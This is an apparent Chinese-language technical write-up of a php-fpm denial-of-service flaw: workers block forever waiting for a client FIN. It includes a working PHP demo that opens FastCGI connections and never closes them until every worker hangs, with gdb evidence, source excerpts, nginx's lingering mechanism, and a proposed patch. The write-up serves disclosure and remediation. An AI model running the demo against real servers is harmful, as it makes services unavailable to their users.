1   问题

给你一个php server的ip&&port,如何使它不可服务?

PS1:: 这个攻击问题实际上是没有意义的,因为php一般是不对外开放的,只是讨论而已

PS2:: 不过在实际环境中,如果持续性的fin包丢失,的确也是会产生服务不可用的问题(至少我们线上已经出现过每天丢一部分的fin包了-_-||)

PS3:: php因为fin包丢失而永久hang住的问题是存在的,只是fin包是如何丢失的,又是另外一个问题了

2   做法

2.1   思路

利用现有php源码的缺陷

php-cgi worker里的fd都是阻塞的,同时没有设置读写超时,而且代码里还写了一个死循环来接收最后的fin包

于是可以根据fast-cgi协议,构造一个请求,最后不关闭socket,这样就可以使php-cgi 的一个worker hang住

持续性这样的请求,使所有的worker都hang住,这样server就不可用了

2.2   demo-code

<?php
require_once "./lib/fastcgipro.php";

// Address and port of the FastCGI server that make_hang_main() connects to.
define('FCGI_HOST', '127.0.0.1');
define('FCGI_PORT', 19550);

// Script entry point.
make_hang_main();

/**
 * Demo loop: on every iteration open a new TCP connection to
 * FCGI_HOST:FCGI_PORT, send one request over it, dump the response, and
 * leave the socket open.
 *
 * The for loop has no exit condition, so this function never returns on its
 * own and the cleanup loop at the bottom is unreachable.
 *
 * send_request() and get_response() are not defined in this script
 * (presumably they come from ./lib/fastcgipro.php -- confirm).
 */
function make_hang_main()
{
    for($cnt = 1; ;++$cnt)
    {
        // One socket per iteration, stored under the iteration counter.
        $socket[$cnt] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        socket_connect($socket[$cnt], FCGI_HOST, FCGI_PORT);

        // Empty body; the iteration counter doubles as the request id.
        $content_body = '';
        $fcgi_request_id = $cnt;
        $env = array(
            'SCRIPT_FILENAME' => '/home/file_not_exist.php',
            'REQUEST_METHOD'  => 'GET',
            'CONTENT_LENGTH' => strlen($content_body),
        );

        send_request($socket[$cnt], $content_body, $env, $fcgi_request_id);
        $result = get_response($socket[$cnt]);
        echo "***************$cnt*****************\n";
        var_dump($result);
        // Intentionally NOT calling socket_close($socket[$cnt]) here,
        // so no FIN is sent to the server for this connection.
    }

    // Unreachable: the loop above never terminates.
    for($i = 1; $i <= $cnt; ++$i)
    {
        socket_close($socket[$i]);
    }
}

2.3   测试结果

在fpm里设置max_children为10,那么发完10个请求后,第11个请求就会一直hang在那里,整个server处于无法服务的状态

随便gdb一个worker的进程,可以看到hang在接收网络数据的地方:

(gdb) bt
#0  0x0000003f0b90b4e4 in recv () from /lib64/tls/libpthread.so.0
#1  0x000000000098ed78 in fcgi_close (req=0x7fffa8c58ad0, force=0, destroy=1) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fastcgi.c:763
#2  0x000000000098f82d in fcgi_finish_request (req=0x7fffa8c58ad0, force_close=0) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fastcgi.c:1081
#3  0x0000000000999f55 in sapi_cgi_deactivate () at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fpm_main.c:847
#4  0x0000000000871a9b in sapi_deactivate () at /home/users/lihongbin/git/php-src/main/SAPI.c:536
#5  0x0000000000866580 in php_request_shutdown (dummy=0x0) at /home/users/lihongbin/git/php-src/main/main.c:1817
#6  0x000000000099c317 in main (argc=7, argv=0x7fffa8c5acb8) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fpm_main.c:1981

2.4   网络交互流程图

TCP四次挥手流程图:

client                       php-cgi
    |                            |
    |       FIN                  |shutdown(req->fd, 1)
    | <------------------------- |       ||
    |       ACK                  |       ||
    | -------------------------> |       \/
    |      FIN                   |while(recv(req->fd, buf, sizeof(buf), 0) > 0) => wait FIN
    | -------------------------> |
    |      ACK                   |
    | <------------------------- |
    |                            |
    |                            |

2.5   refer code

//sapi/fpm/fpm/fastcgi.c
/*
 * Excerpt of fcgi_close(); elided parts are marked with dotted comments.
 *
 * When the connection is not kept (force set, or req->keep clear) and req->fd
 * is valid, the socket is closed. On the non-forced path the write side is
 * shut down first and the read side is drained with recv() until it returns
 * <= 0. No receive timeout is set anywhere in the code shown, so this drain
 * loop is where a worker waits for the client's FIN.
 */
void fcgi_close(fcgi_request *req, int force, int destroy)
{
    //................

    if ((force || !req->keep) && req->fd >= 0) {
#ifdef _WIN32
    //.................
            shutdown(req->fd, 1);
            while (recv(req->fd, buf, sizeof(buf), 0) > 0) {}// hangs here if the client never sends its FIN
    //................
#else
        if (!force) {// on the fcgi_finish_request -> fcgi_close path shown in the backtrace, force is 0, so this branch is taken
            char buf[8];

            /* Half-close: stop sending, then read until the peer closes. */
            shutdown(req->fd, 1);
            while (recv(req->fd, buf, sizeof(buf), 0) > 0) {}// hangs here if the client never sends its FIN
        }
        close(req->fd);
#endif
        /* Mark the descriptor as closed. */
        req->fd = -1;
        fpm_request_finished();
    }
}

3   request_terminate_timeout能解决问题?

在fpm的配置里有一个request_terminate_timeout配置项,从外围来监控进程的运行时间,这个选项能解决问题?

很遗憾,在目前的代码里是没有办法的,具体来看代码

先来看worker的处理流程代码

//sapi/fpm/fpm/fpm_main.c
/*
 * Excerpt of the FPM main(); elided parts are marked with dotted comments.
 *
 * Shows the per-request loop: accept a request, execute the script, mark the
 * request as ended, then run php_request_shutdown(), which is the call that
 * ends up in fcgi_close().
 */
int main(int argc, char *argv[])
{
    //..............
    fcgi_fd = fpm_run(&max_requests);// in the fpm master process, execution stays inside fpm_run() monitoring events; the code below is run by workers
    //.................
    zend_first_try {
        while (fcgi_accept_request(&request) >= 0) {
            //................

            fpm_request_info();

            //...........

            fpm_request_executing();

            php_execute_script(&file_handle TSRMLS_CC);

            //............
            fpm_request_end(TSRMLS_C);// sets request_stage to FPM_REQUEST_FINISHED
            fpm_log_write(NULL TSRMLS_CC);

            STR_FREE(SG(request_info).path_translated);
            SG(request_info).path_translated = NULL;

            php_request_shutdown((void *) 0);// php_request_shutdown -> sapi_deactivate -> sapi_cgi_deactivate -> fcgi_finish_request -> fcgi_close
                                             // the client's trailing data is received in the fcgi_close function shown earlier

            requests++;
            /* Leave the loop once the configured number of requests is reached. */
            if (max_requests && (requests == max_requests)) {
                fcgi_finish_request(&request, 1);
                break;
            }
            /* end of fastcgi loop */
        }
        //..................
    } zend_catch {
        exit_status = FPM_EXIT_SOFTWARE;
    } zend_end_try();
}

再看fpm控制worker进程的处理代码

fpm的master进程有一个心跳监控机制,每隔一段时间(最多1秒)检查一下每个worker是否超过了执行时间,如果超过,则kill该worker,重新生成一个worker接收请求

PS:后续再搞一个文章介绍一下fpm的运行机制

fpm基本的流程:

main -> fpm_run -> fpm_event_loop -> fpm_pctl_heartbeat -> fpm_pctl_check_request_timeout -> fpm_request_check_timed_out

来详细看看fpm_request_check_timed_out函数

//sapi/fpm/fpm/fpm_request.c
/*
 * Excerpt of fpm_request_check_timed_out(); elided parts are marked with
 * dotted comments (the slow-log handling is among the elided code).
 *
 * Takes a snapshot of the child's scoreboard entry and, only while the
 * request stage is strictly between FPM_REQUEST_ACCEPTING and
 * FPM_REQUEST_END, computes the time elapsed since proc.accepted. If
 * terminate_timeout is non-zero and at least that many seconds have elapsed,
 * the child is sent FPM_PCTL_TERM and a warning is logged.
 */
void fpm_request_check_timed_out(struct fpm_child_s *child, struct timeval *now, int terminate_timeout, int slowlog_timeout) /* {{{ */
{
    struct fpm_scoreboard_proc_s proc, *proc_p;

    proc_p = fpm_scoreboard_proc_acquire(child->wp->scoreboard, child->scoreboard_i, 1);
    if (!proc_p) {
        zlog(ZLOG_WARNING, "failed to acquire scoreboard");
        return;
    }

    /* Work on a local copy so the scoreboard entry can be released at once. */
    proc = *proc_p;
    fpm_scoreboard_proc_release(proc_p);

    //.........................

    if (proc.request_stage > FPM_REQUEST_ACCEPTING && proc.request_stage < FPM_REQUEST_END) { // NOTE: this stage check is the key point
    // By this time request_stage has already been set to FPM_REQUEST_FINISHED, which (per the article; the enum is not shown here) is greater than FPM_REQUEST_END.
    // So while fcgi_close is draining leftover client data, this branch is never entered, the timed-out worker is never killed, and it stays hung.

        char purified_script_filename[sizeof(proc.script_filename)];
        struct timeval tv;

        /* tv = now - time the request was accepted. */
        timersub(now, &proc.accepted, &tv);

        //.................
        // slow log
        if (terminate_timeout && tv.tv_sec >= terminate_timeout) {
            str_purify_filename(purified_script_filename, proc.script_filename, sizeof(proc.script_filename));
            fpm_pctl_kill(child->pid, FPM_PCTL_TERM);

            zlog(ZLOG_WARNING, "[pool %s] child %d, script '%s' (request: \"%s %s\") execution timed out (%d.%06d sec), terminating",
                child->wp->config->name, (int) child->pid, purified_script_filename, proc.request_method, proc.request_uri,
                (int) tv.tv_sec, (int) tv.tv_usec);
        }
    }
}

4   nginx的解决办法

其实nginx也会遇到这种情况,在我们线上已经发生过了,不过nginx处理得不错

nginx 有lingering机制解决这种case,具体有三个相关参数

4.1   lingering_close

lingering_close 表示当server关闭socket的写端的时候,是否需要继续从client端接收额外的数据

4.2   lingering_time

lingering_time 表示当lingering_close生效的时候,即继续接收数据的时候,接收数据的最长总时间(超过这个时间后,即使还有数据到来也会关闭连接)

4.3   lingering_timeout

在lingering_timeout内必须有数据到达,否则停止接收数据并关闭连接,是一种idle timeout机制

4.4   refer code

/*
 * Put the request's connection into lingering close.
 *
 * Steps performed, in order:
 *   1. install ngx_http_lingering_close_handler as the read handler;
 *   2. record the overall deadline in r->lingering_time and arm a timer on
 *      the read event with clcf->lingering_timeout;
 *   3. register the read event;
 *   4. replace the write handler with ngx_http_empty_handler and, for
 *      level-triggered event methods, remove an active write event;
 *   5. shut down the write side of the socket;
 *   6. if the read event is already ready, run the lingering handler now.
 *
 * Any failure in steps 3-5 closes the request via ngx_http_close_request().
 */
static void ngx_http_set_lingering_close(ngx_http_request_t *r)
{
    ngx_event_t               *rev, *wev;
    ngx_connection_t          *c;
    ngx_http_core_loc_conf_t  *clcf;

    c = r->connection;

    clcf = ngx_http_get_module_loc_conf(r, ngx_http_core_module);

    rev = c->read;
    rev->handler = ngx_http_lingering_close_handler;// read handler used while lingering

    /* Deadline = now + lingering_time / 1000 (presumably ms -> s; confirm). */
    r->lingering_time = ngx_time() + (time_t) (clcf->lingering_time / 1000);// set lingering_time
    ngx_add_timer(rev, clcf->lingering_timeout);// arm the lingering_timeout timer on the read event

    if (ngx_handle_read_event(rev, 0) != NGX_OK) {
        ngx_http_close_request(r, 0);
        return;
    }

    /* Nothing more will be written: neutralize the write handler. */
    wev = c->write;
    wev->handler = ngx_http_empty_handler;

    if (wev->active && (ngx_event_flags & NGX_USE_LEVEL_EVENT)) {
        if (ngx_del_event(wev, NGX_WRITE_EVENT, 0) != NGX_OK) {
            ngx_http_close_request(r, 0);
            return;
        }
    }

    /* Half-close: shut down only the write direction. */
    if (ngx_shutdown_socket(c->fd, NGX_WRITE_SHUTDOWN) == -1) {
        ngx_connection_error(c, ngx_socket_errno,
                             ngx_shutdown_socket_n " failed");
        ngx_http_close_request(r, 0);
        return;
    }

    /* Data is already pending: handle it right away. */
    if (rev->ready) {
        ngx_http_lingering_close_handler(rev);
    }
}

5   php的解决办法

5.1   思路

学习nginx的lingering机制,在php.ini里增加两个参数,来约束对client最后发送的无用数据的接收

  • lingering_time_s:接受无用数据的最长时间,单位是秒
  • lingering_timeout_ms:idle timeout机制,在lingering_timeout_ms时间内都没有收到数据的话,就关闭socket,停止接收数据,单位是毫秒

5.2   refer core code

char buf[8];
time_t start, end;
int sec;

shutdown(req->fd, 1);
if (PG(lingering_timeout_ms) > 0) {
    struct timeval ltimeout = {PG(lingering_timeout_ms)/1000, 1000 * (PG(lingering_timeout_ms) % 1000)};
    setsockopt(req->fd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&ltimeout, sizeof(ltimeout));
} else if (PG(lingering_time_s) > 0) {
    struct timeval ltimeout = {PG(lingering_time_s), 0};
    setsockopt(req->fd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&ltimeout, sizeof(ltimeout));
}

time(&start);
while (recv(req->fd, buf, sizeof(buf), 0) > 0) {
     if (PG(lingering_time_s) > 0) {
         time(&end);
         sec = (int)(end-start);
         if (sec > PG(lingering_time_s)) {
             break;
         }
     }
 }

5.3   github上的PR

https://github.com/php/php-src/pull/966